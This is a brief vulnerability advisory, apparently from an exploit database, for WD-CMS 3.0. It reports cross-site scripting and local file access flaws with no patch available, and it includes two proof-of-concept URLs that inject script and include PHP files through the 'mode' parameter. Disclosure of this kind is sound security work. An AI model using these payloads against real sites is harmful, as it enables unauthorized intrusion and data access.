vendor:
WD-CMS
by:
Sora
8,8
CVSS
HIGH
XSS and Remote File Access
79, 22
CWE
Product Name: WD-CMS
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:web_diamond:wd-cms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista and Linux (Backtrack 3)
2009
WD-CMS 3.0 Multiple Vulnerabilities
The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities. Vulnerabilities include XSS and remote file access. XSS Proof of Concept: http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E Remote File Access Proof of Concept: http://www.site.com/index.php?l=eng&mode=./index (as it adds .php at the end)
Mitigation:
Input validation and sanitization should be done to prevent XSS and remote file access vulnerabilities.